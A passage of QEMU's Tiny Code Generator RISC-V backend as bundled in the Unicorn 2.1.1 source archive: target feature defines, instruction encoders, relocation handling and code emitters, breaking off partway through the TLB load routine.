1 #define TCG_TARGET_HAS_extrh_i64_i32 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 0 #define TCG_TARGET_HAS_bswap32_i64 0 #define TCG_TARGET_HAS_bswap64_i64 0 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 0 #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 0 #define TCG_TARGET_HAS_muluh_i64 1 #define TCG_TARGET_HAS_mulsh_i64 1 #endif static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { __builtin___clear_cache((char *)start, (char *)stop); } /* not defined -- call should be eliminated at compile time */ void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #define TCG_TARGET_DEFAULT_MO (0) #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #define TCG_TARGET_NEED_POOL_LABELS #define TCG_TARGET_HAS_MEMORY_BSWAP 0 #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/riscv/tcg-target.inc.c�������������������������������������������������������0000664�0000000�0000000�00000155643�14675241067�0021051�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2018 SiFive, Inc * Copyright (c) 2008-2009 Arnaud Patard <arnaud.patard@rtp-net.org> * Copyright (c) 2009 Aurelien Jarno <aurelien@aurel32.net> * Copyright (c) 2008 Fabrice Bellard * * Based on i386/tcg-target.c and mips/tcg-target.c * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "../tcg-pool.inc.c" #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "zero", "ra", "sp", "gp", "tp", "t0", "t1", "t2", "s0", "s1", "a0", "a1", "a2", "a3", "a4", "a5", "a6", "a7", "s2", "s3", "s4", "s5", "s6", "s7", "s8", "s9", "s10", "s11", "t3", "t4", "t5", "t6" }; #endif static const int tcg_target_reg_alloc_order[] = { /* Call saved registers */ /* TCG_REG_S0 reservered for TCG_AREG0 */ TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_S9, TCG_REG_S10, TCG_REG_S11, /* Call clobbered registers */ TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_T3, TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, /* Argument registers */ TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, TCG_REG_A4, TCG_REG_A5, TCG_REG_A6, TCG_REG_A7, }; static const int tcg_target_call_iarg_regs[] = { TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, TCG_REG_A4, TCG_REG_A5, TCG_REG_A6, TCG_REG_A7, }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_A0, TCG_REG_A1, }; #define TCG_CT_CONST_ZERO 0x100 #define TCG_CT_CONST_S12 0x200 #define TCG_CT_CONST_N12 0x400 #define TCG_CT_CONST_M12 0x800 static inline tcg_target_long sextreg(tcg_target_long val, int pos, int len) { if (TCG_TARGET_REG_BITS == 32) { return sextract32(val, pos, len); } else { return sextract64(val, pos, len); } } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'L': /* qemu_ld/qemu_st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; /* qemu_ld/qemu_st uses TCG_REG_TMP0 */ #if defined(CONFIG_SOFTMMU) tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[0]); tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[1]); tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[2]); tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[3]); tcg_regset_reset_reg(ct->u.regs, tcg_target_call_iarg_regs[4]); #endif break; case 'I': ct->ct |= TCG_CT_CONST_S12; break; case 'N': ct->ct |= TCG_CT_CONST_N12; break; case 'M': ct->ct |= TCG_CT_CONST_M12; break; case 'Z': /* we can use a zero immediate as a zero register argument. */ ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } if ((ct & TCG_CT_CONST_S12) && val == sextreg(val, 0, 12)) { return 1; } if ((ct & TCG_CT_CONST_N12) && -val == sextreg(-val, 0, 12)) { return 1; } if ((ct & TCG_CT_CONST_M12) && val >= -0xfff && val <= 0xfff) { return 1; } return 0; } /* * RISC-V Base ISA opcodes (IM) */ typedef enum { OPC_ADD = 0x33, OPC_ADDI = 0x13, OPC_AND = 0x7033, OPC_ANDI = 0x7013, OPC_AUIPC = 0x17, OPC_BEQ = 0x63, OPC_BGE = 0x5063, OPC_BGEU = 0x7063, OPC_BLT = 0x4063, OPC_BLTU = 0x6063, OPC_BNE = 0x1063, OPC_DIV = 0x2004033, OPC_DIVU = 0x2005033, OPC_JAL = 0x6f, OPC_JALR = 0x67, OPC_LB = 0x3, OPC_LBU = 0x4003, OPC_LD = 0x3003, OPC_LH = 0x1003, OPC_LHU = 0x5003, OPC_LUI = 0x37, OPC_LW = 0x2003, OPC_LWU = 0x6003, OPC_MUL = 0x2000033, OPC_MULH = 0x2001033, OPC_MULHSU = 0x2002033, OPC_MULHU = 0x2003033, OPC_OR = 0x6033, OPC_ORI = 0x6013, OPC_REM = 0x2006033, OPC_REMU = 0x2007033, OPC_SB = 0x23, OPC_SD = 0x3023, OPC_SH = 0x1023, OPC_SLL = 0x1033, OPC_SLLI = 0x1013, OPC_SLT = 0x2033, OPC_SLTI = 0x2013, OPC_SLTIU = 0x3013, OPC_SLTU = 0x3033, OPC_SRA = 0x40005033, OPC_SRAI = 0x40005013, OPC_SRL = 0x5033, OPC_SRLI = 0x5013, OPC_SUB = 0x40000033, OPC_SW = 0x2023, OPC_XOR = 0x4033, OPC_XORI = 0x4013, #if TCG_TARGET_REG_BITS == 64 OPC_ADDIW = 0x1b, OPC_ADDW = 0x3b, OPC_DIVUW = 0x200503b, OPC_DIVW = 0x200403b, OPC_MULW = 0x200003b, OPC_REMUW = 0x200703b, OPC_REMW = 0x200603b, OPC_SLLIW = 0x101b, OPC_SLLW = 0x103b, OPC_SRAIW = 0x4000501b, OPC_SRAW = 0x4000503b, OPC_SRLIW = 0x501b, OPC_SRLW = 0x503b, OPC_SUBW = 0x4000003b, #else /* Simplify code throughout by defining aliases for RV32. */ OPC_ADDIW = OPC_ADDI, OPC_ADDW = OPC_ADD, OPC_DIVUW = OPC_DIVU, OPC_DIVW = OPC_DIV, OPC_MULW = OPC_MUL, OPC_REMUW = OPC_REMU, OPC_REMW = OPC_REM, OPC_SLLIW = OPC_SLLI, OPC_SLLW = OPC_SLL, OPC_SRAIW = OPC_SRAI, OPC_SRAW = OPC_SRA, OPC_SRLIW = OPC_SRLI, OPC_SRLW = OPC_SRL, OPC_SUBW = OPC_SUB, #endif OPC_FENCE = 0x0000000f, } RISCVInsn; /* * RISC-V immediate and instruction encoders (excludes 16-bit RVC) */ /* Type-R */ static int32_t encode_r(RISCVInsn opc, TCGReg rd, TCGReg rs1, TCGReg rs2) { return opc | (rd & 0x1f) << 7 | (rs1 & 0x1f) << 15 | (rs2 & 0x1f) << 20; } /* Type-I */ static int32_t encode_imm12(uint32_t imm) { return (imm & 0xfff) << 20; } static int32_t encode_i(RISCVInsn opc, TCGReg rd, TCGReg rs1, uint32_t imm) { return opc | (rd & 0x1f) << 7 | (rs1 & 0x1f) << 15 | encode_imm12(imm); } /* Type-S */ static int32_t encode_simm12(uint32_t imm) { int32_t ret = 0; ret |= (imm & 0xFE0) << 20; ret |= (imm & 0x1F) << 7; return ret; } static int32_t encode_s(RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { return opc | (rs1 & 0x1f) << 15 | (rs2 & 0x1f) << 20 | encode_simm12(imm); } /* Type-SB */ static int32_t encode_sbimm12(uint32_t imm) { int32_t ret = 0; ret |= (imm & 0x1000) << 19; ret |= (imm & 0x7e0) << 20; ret |= (imm & 0x1e) << 7; ret |= (imm & 0x800) >> 4; return ret; } static int32_t encode_sb(RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { return opc | (rs1 & 0x1f) << 15 | (rs2 & 0x1f) << 20 | encode_sbimm12(imm); } /* Type-U */ static int32_t encode_uimm20(uint32_t imm) { return imm & 0xfffff000; } static int32_t encode_u(RISCVInsn opc, TCGReg rd, uint32_t imm) { return opc | (rd & 0x1f) << 7 | encode_uimm20(imm); } /* Type-UJ */ static int32_t encode_ujimm20(uint32_t imm) { int32_t ret = 0; ret |= (imm & 0x0007fe) << (21 - 1); ret |= (imm & 0x000800) << (20 - 11); ret |= (imm & 0x0ff000) << (12 - 12); ret |= (imm & 0x100000) << (31 - 20); return ret; } static int32_t encode_uj(RISCVInsn opc, TCGReg rd, uint32_t imm) { return opc | (rd & 0x1f) << 7 | encode_ujimm20(imm); } /* * RISC-V instruction emitters */ static void tcg_out_opc_reg(TCGContext *s, RISCVInsn opc, TCGReg rd, TCGReg rs1, TCGReg rs2) { tcg_out32(s, encode_r(opc, rd, rs1, rs2)); } static void tcg_out_opc_imm(TCGContext *s, RISCVInsn opc, TCGReg rd, TCGReg rs1, TCGArg imm) { tcg_out32(s, encode_i(opc, rd, rs1, imm)); } static void tcg_out_opc_store(TCGContext *s, RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { tcg_out32(s, encode_s(opc, rs1, rs2, imm)); } static void tcg_out_opc_branch(TCGContext *s, RISCVInsn opc, TCGReg rs1, TCGReg rs2, uint32_t imm) { tcg_out32(s, encode_sb(opc, rs1, rs2, imm)); } static void tcg_out_opc_upper(TCGContext *s, RISCVInsn opc, TCGReg rd, uint32_t imm) { tcg_out32(s, encode_u(opc, rd, imm)); } static void tcg_out_opc_jump(TCGContext *s, RISCVInsn opc, TCGReg rd, uint32_t imm) { tcg_out32(s, encode_uj(opc, rd, imm)); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = encode_i(OPC_ADDI, TCG_REG_ZERO, TCG_REG_ZERO, 0); } } /* * Relocations */ static bool reloc_sbimm12(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { intptr_t offset = (intptr_t)target - (intptr_t)code_ptr; if (offset == sextreg(offset, 1, 12) << 1) { code_ptr[0] |= encode_sbimm12(offset); return true; } return false; } static bool reloc_jimm20(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { intptr_t offset = (intptr_t)target - (intptr_t)code_ptr; if (offset == sextreg(offset, 1, 20) << 1) { code_ptr[0] |= encode_ujimm20(offset); return true; } return false; } static bool reloc_call(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { intptr_t offset = (intptr_t)target - (intptr_t)code_ptr; int32_t lo = sextreg(offset, 0, 12); int32_t hi = offset - lo; if (offset == hi + lo) { code_ptr[0] |= encode_uimm20(hi); code_ptr[1] |= encode_imm12(lo); return true; } return false; } static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { uint32_t insn = *code_ptr; intptr_t diff; bool short_jmp; tcg_debug_assert(addend == 0); switch (type) { case R_RISCV_BRANCH: diff = value - (uintptr_t)code_ptr; short_jmp = diff == sextreg(diff, 0, 12); if (short_jmp) { return reloc_sbimm12(code_ptr, (tcg_insn_unit *)value); } else { /* Invert the condition */ insn = insn ^ (1 << 12); /* Clear the offset */ insn &= 0x01fff07f; /* Set the offset to the PC + 8 */ insn |= encode_sbimm12(8); /* Move forward */ code_ptr[0] = insn; /* Overwrite the NOP with jal x0,value */ diff = value - (uintptr_t)(code_ptr + 1); insn = encode_uj(OPC_JAL, TCG_REG_ZERO, diff); code_ptr[1] = insn; return true; } break; case R_RISCV_JAL: return reloc_jimm20(code_ptr, (tcg_insn_unit *)value); break; case R_RISCV_CALL: return reloc_call(code_ptr, (tcg_insn_unit *)value); break; default: tcg_abort(); } } /* * TCG intrinsics */ static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret == arg) { return true; } switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: tcg_out_opc_imm(s, OPC_ADDI, ret, arg, 0); break; default: g_assert_not_reached(); } return true; } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg rd, tcg_target_long val) { tcg_target_long lo, hi, tmp; int shift, ret; if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { val = (int32_t)val; } lo = sextreg(val, 0, 12); if (val == lo) { tcg_out_opc_imm(s, OPC_ADDI, rd, TCG_REG_ZERO, lo); return; } hi = val - lo; if (TCG_TARGET_REG_BITS == 32 || val == (int32_t)val) { tcg_out_opc_upper(s, OPC_LUI, rd, hi); if (lo != 0) { tcg_out_opc_imm(s, OPC_ADDIW, rd, rd, lo); } return; } /* We can only be here if TCG_TARGET_REG_BITS != 32 */ tmp = tcg_pcrel_diff(s, (void *)val); if (tmp == (int32_t)tmp) { tcg_out_opc_upper(s, OPC_AUIPC, rd, 0); tcg_out_opc_imm(s, OPC_ADDI, rd, rd, 0); ret = reloc_call(s->code_ptr - 2, (tcg_insn_unit *)val); tcg_debug_assert(ret == true); return; } /* Look for a single 20-bit section. */ shift = ctz64(val); tmp = val >> shift; if (tmp == sextreg(tmp, 0, 20)) { tcg_out_opc_upper(s, OPC_LUI, rd, tmp << 12); if (shift > 12) { tcg_out_opc_imm(s, OPC_SLLI, rd, rd, shift - 12); } else { tcg_out_opc_imm(s, OPC_SRAI, rd, rd, 12 - shift); } return; } /* Look for a few high zero bits, with lots of bits set in the middle. */ shift = clz64(val); tmp = val << shift; if (tmp == sextreg(tmp, 12, 20) << 12) { tcg_out_opc_upper(s, OPC_LUI, rd, tmp); tcg_out_opc_imm(s, OPC_SRLI, rd, rd, shift); return; } else if (tmp == sextreg(tmp, 0, 12)) { tcg_out_opc_imm(s, OPC_ADDI, rd, TCG_REG_ZERO, tmp); tcg_out_opc_imm(s, OPC_SRLI, rd, rd, shift); return; } /* Drop into the constant pool. */ new_pool_label(s, val, R_RISCV_CALL, s->code_ptr, 0); tcg_out_opc_upper(s, OPC_AUIPC, rd, 0); tcg_out_opc_imm(s, OPC_LD, rd, rd, 0); } static void tcg_out_ext8u(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_ANDI, ret, arg, 0xff); } static void tcg_out_ext16u(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLIW, ret, arg, 16); tcg_out_opc_imm(s, OPC_SRLIW, ret, ret, 16); } static void tcg_out_ext32u(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLI, ret, arg, 32); tcg_out_opc_imm(s, OPC_SRLI, ret, ret, 32); } static void tcg_out_ext8s(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLIW, ret, arg, 24); tcg_out_opc_imm(s, OPC_SRAIW, ret, ret, 24); } static void tcg_out_ext16s(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_SLLIW, ret, arg, 16); tcg_out_opc_imm(s, OPC_SRAIW, ret, ret, 16); } static void tcg_out_ext32s(TCGContext *s, TCGReg ret, TCGReg arg) { tcg_out_opc_imm(s, OPC_ADDIW, ret, arg, 0); } static void tcg_out_ldst(TCGContext *s, RISCVInsn opc, TCGReg data, TCGReg addr, intptr_t offset) { intptr_t imm12 = sextreg(offset, 0, 12); if (offset != imm12) { intptr_t diff = offset - (uintptr_t)s->code_ptr; if (addr == TCG_REG_ZERO && diff == (int32_t)diff) { imm12 = sextreg(diff, 0, 12); tcg_out_opc_upper(s, OPC_AUIPC, TCG_REG_TMP2, diff - imm12); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP2, offset - imm12); if (addr != TCG_REG_ZERO) { tcg_out_opc_reg(s, OPC_ADD, TCG_REG_TMP2, TCG_REG_TMP2, addr); } } addr = TCG_REG_TMP2; } switch (opc) { case OPC_SB: case OPC_SH: case OPC_SW: case OPC_SD: tcg_out_opc_store(s, opc, addr, data, imm12); break; case OPC_LB: case OPC_LBU: case OPC_LH: case OPC_LHU: case OPC_LW: case OPC_LWU: case OPC_LD: tcg_out_opc_imm(s, opc, data, addr, imm12); break; default: g_assert_not_reached(); } } static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { bool is32bit = (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32); tcg_out_ldst(s, is32bit ? OPC_LW : OPC_LD, arg, arg1, arg2); } static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { bool is32bit = (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32); tcg_out_ldst(s, is32bit ? OPC_SW : OPC_SD, arg, arg1, arg2); } static bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (val == 0) { tcg_out_st(s, type, TCG_REG_ZERO, base, ofs); return true; } return false; } static void tcg_out_addsub2(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, TCGArg bl, TCGArg bh, bool cbl, bool cbh, bool is_sub, bool is32bit) { const RISCVInsn opc_add = is32bit ? OPC_ADDW : OPC_ADD; const RISCVInsn opc_addi = is32bit ? OPC_ADDIW : OPC_ADDI; const RISCVInsn opc_sub = is32bit ? OPC_SUBW : OPC_SUB; TCGReg th = TCG_REG_TMP1; /* If we have a negative constant such that negating it would make the high part zero, we can (usually) eliminate one insn. */ if (cbl && cbh && bh == -1 && bl != 0) { bl = -bl; bh = 0; is_sub = !is_sub; } /* By operating on the high part first, we get to use the final carry operation to move back from the temporary. */ if (!cbh) { tcg_out_opc_reg(s, (is_sub ? opc_sub : opc_add), th, ah, bh); } else if (bh != 0 || ah == rl) { tcg_out_opc_imm(s, opc_addi, th, ah, (is_sub ? -bh : bh)); } else { th = ah; } /* Note that tcg optimization should eliminate the bl == 0 case. */ if (is_sub) { if (cbl) { tcg_out_opc_imm(s, OPC_SLTIU, TCG_REG_TMP0, al, bl); tcg_out_opc_imm(s, opc_addi, rl, al, -bl); } else { tcg_out_opc_reg(s, OPC_SLTU, TCG_REG_TMP0, al, bl); tcg_out_opc_reg(s, opc_sub, rl, al, bl); } tcg_out_opc_reg(s, opc_sub, rh, th, TCG_REG_TMP0); } else { if (cbl) { tcg_out_opc_imm(s, opc_addi, rl, al, bl); tcg_out_opc_imm(s, OPC_SLTIU, TCG_REG_TMP0, rl, bl); } else if (rl == al && rl == bl) { tcg_out_opc_imm(s, OPC_SLTI, TCG_REG_TMP0, al, 0); tcg_out_opc_reg(s, opc_addi, rl, al, bl); } else { tcg_out_opc_reg(s, opc_add, rl, al, bl); tcg_out_opc_reg(s, OPC_SLTU, TCG_REG_TMP0, rl, (rl == bl ? al : bl)); } tcg_out_opc_reg(s, opc_add, rh, th, TCG_REG_TMP0); } } static const struct { RISCVInsn op; bool swap; } tcg_brcond_to_riscv[] = { [TCG_COND_EQ] = { OPC_BEQ, false }, [TCG_COND_NE] = { OPC_BNE, false }, [TCG_COND_LT] = { OPC_BLT, false }, [TCG_COND_GE] = { OPC_BGE, false }, [TCG_COND_LE] = { OPC_BGE, true }, [TCG_COND_GT] = { OPC_BLT, true }, [TCG_COND_LTU] = { OPC_BLTU, false }, [TCG_COND_GEU] = { OPC_BGEU, false }, [TCG_COND_LEU] = { OPC_BGEU, true }, [TCG_COND_GTU] = { OPC_BLTU, true } }; static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, TCGReg arg2, TCGLabel *l) { RISCVInsn op = tcg_brcond_to_riscv[cond].op; tcg_debug_assert(op != 0); if (tcg_brcond_to_riscv[cond].swap) { TCGReg t = arg1; arg1 = arg2; arg2 = t; } if (l->has_value) { intptr_t diff = tcg_pcrel_diff(s, l->u.value_ptr); if (diff == sextreg(diff, 0, 12)) { tcg_out_opc_branch(s, op, arg1, arg2, diff); } else { /* Invert the conditional branch. */ tcg_out_opc_branch(s, op ^ (1 << 12), arg1, arg2, 8); tcg_out_opc_jump(s, OPC_JAL, TCG_REG_ZERO, diff - 4); } } else { tcg_out_reloc(s, s->code_ptr, R_RISCV_BRANCH, l, 0); tcg_out_opc_branch(s, op, arg1, arg2, 0); /* NOP to allow patching later */ tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_ZERO, TCG_REG_ZERO, 0); } } static void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg arg1, TCGReg arg2) { switch (cond) { case TCG_COND_EQ: tcg_out_opc_reg(s, OPC_SUB, ret, arg1, arg2); tcg_out_opc_imm(s, OPC_SLTIU, ret, ret, 1); break; case TCG_COND_NE: tcg_out_opc_reg(s, OPC_SUB, ret, arg1, arg2); tcg_out_opc_reg(s, OPC_SLTU, ret, TCG_REG_ZERO, ret); break; case TCG_COND_LT: tcg_out_opc_reg(s, OPC_SLT, ret, arg1, arg2); break; case TCG_COND_GE: tcg_out_opc_reg(s, OPC_SLT, ret, arg1, arg2); tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); break; case TCG_COND_LE: tcg_out_opc_reg(s, OPC_SLT, ret, arg2, arg1); tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); break; case TCG_COND_GT: tcg_out_opc_reg(s, OPC_SLT, ret, arg2, arg1); break; case TCG_COND_LTU: tcg_out_opc_reg(s, OPC_SLTU, ret, arg1, arg2); break; case TCG_COND_GEU: tcg_out_opc_reg(s, OPC_SLTU, ret, arg1, arg2); tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); break; case TCG_COND_LEU: tcg_out_opc_reg(s, OPC_SLTU, ret, arg2, arg1); tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); break; case TCG_COND_GTU: tcg_out_opc_reg(s, OPC_SLTU, ret, arg2, arg1); break; default: g_assert_not_reached(); break; } } static void tcg_out_brcond2(TCGContext *s, TCGCond cond, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh, TCGLabel *l) { /* todo */ g_assert_not_reached(); } static void tcg_out_setcond2(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) { /* todo */ g_assert_not_reached(); } static inline void tcg_out_goto(TCGContext *s, tcg_insn_unit *target) { ptrdiff_t offset = tcg_pcrel_diff(s, target); tcg_debug_assert(offset == sextreg(offset, 1, 20) << 1); tcg_out_opc_jump(s, OPC_JAL, TCG_REG_ZERO, offset); } static void tcg_out_call_int(TCGContext *s, tcg_insn_unit *arg, bool tail) { TCGReg link = tail ? TCG_REG_ZERO : TCG_REG_RA; ptrdiff_t offset = tcg_pcrel_diff(s, arg); int ret; if (offset == sextreg(offset, 1, 20) << 1) { /* short jump: -2097150 to 2097152 */ tcg_out_opc_jump(s, OPC_JAL, link, offset); } else if (TCG_TARGET_REG_BITS == 32 || offset == sextreg(offset, 1, 31) << 1) { /* long jump: -2147483646 to 2147483648 */ tcg_out_opc_upper(s, OPC_AUIPC, TCG_REG_TMP0, 0); tcg_out_opc_imm(s, OPC_JALR, link, TCG_REG_TMP0, 0); ret = reloc_call(s->code_ptr - 2, arg);\ tcg_debug_assert(ret == true); } else if (TCG_TARGET_REG_BITS == 64) { /* far jump: 64-bit */ tcg_target_long imm = sextreg((tcg_target_long)arg, 0, 12); tcg_target_long base = (tcg_target_long)arg - imm; tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP0, base); tcg_out_opc_imm(s, OPC_JALR, link, TCG_REG_TMP0, imm); } else { g_assert_not_reached(); } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *arg) { tcg_out_call_int(s, arg, false); } static void tcg_out_mb(TCGContext *s, TCGArg a0) { tcg_insn_unit insn = OPC_FENCE; if (a0 & TCG_MO_LD_LD) { insn |= 0x02200000; } if (a0 & TCG_MO_ST_LD) { insn |= 0x01200000; } if (a0 & TCG_MO_LD_ST) { insn |= 0x02100000; } if (a0 & TCG_MO_ST_ST) { insn |= 0x02200000; } tcg_out32(s, insn); } /* * Load/store and TLB */ #if defined(CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * TCGMemOpIdx oi, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, #if TCG_TARGET_REG_BITS == 64 [MO_LESL] = helper_le_ldsl_mmu, #endif [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, #if TCG_TARGET_REG_BITS == 64 [MO_BESL] = helper_be_ldsl_mmu, #endif [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, TCGMemOpIdx oi, * uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* We don't support oversize guests */ QEMU_BUILD_BUG_ON(TCG_TARGET_REG_BITS < TARGET_LONG_BITS); /* We expect to use a 12-bit negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -(1 << 11)); static void tcg_out_tlb_load(TCGContext *s, TCGReg addrl, TCGReg addrh, TCGMemOpIdx oi, tcg_insn_unit **label_ptr, bool is_load) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif MemOp opc = get_memop(oi); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); tcg_target_long compare_mask; int mem_index = get_mmuidx(oi); int fast_ofs = TLB_MASK_TABLE_OFS(mem_index); int mask_ofs = fast_ofs + offsetof(CPUTLBDescFast, mask); int table_ofs = fast_ofs + offsetof(CPUTLBDescFast, table); TCGReg mask_base = TCG_AREG0, table_base = TCG_AREG0; tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP0, mask_base, mask_ofs); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP1, table_base, table_ofs); tcg_out_opc_imm(s, OPC_SRLI, TCG_REG_TMP2, addrl, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_opc_reg(s, OPC_AND, TCG_REG_TMP2, TCG_REG_TMP2, TCG_REG_TMP0); tcg_out_opc_reg(s, OPC_ADD, TCG_REG_TMP2, TCG_REG_TMP2, TCG_REG_TMP1); /* Load the tlb comparator and the addend. */ tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_TMP0, TCG_REG_TMP2, is_load ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP2, TCG_REG_TMP2, offsetof(CPUTLBEntry, addend)); /* We don't support unaligned accesses. */ if (a_bits < s_bits) { a_bits = s_bits; } /* Clear the non-page, 